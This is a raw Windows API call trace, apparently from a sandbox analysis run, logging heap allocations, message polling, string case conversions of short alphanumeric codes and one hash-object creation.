[0195.241] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.241] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0195.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.241] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.242] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0195.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0195.242] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0195.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.242] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.243] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.243] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.243] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.244] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.244] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.244] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.244] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.244] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.245] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.245] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.245] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.245] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.245] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.246] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.246] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.246] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.246] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.246] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0195.246] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.247] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.247] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.248] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.248] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.248] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.248] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.248] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0195.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.249] CryptCreateHash (in: hProv=0xad6150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0195.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0195.253] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 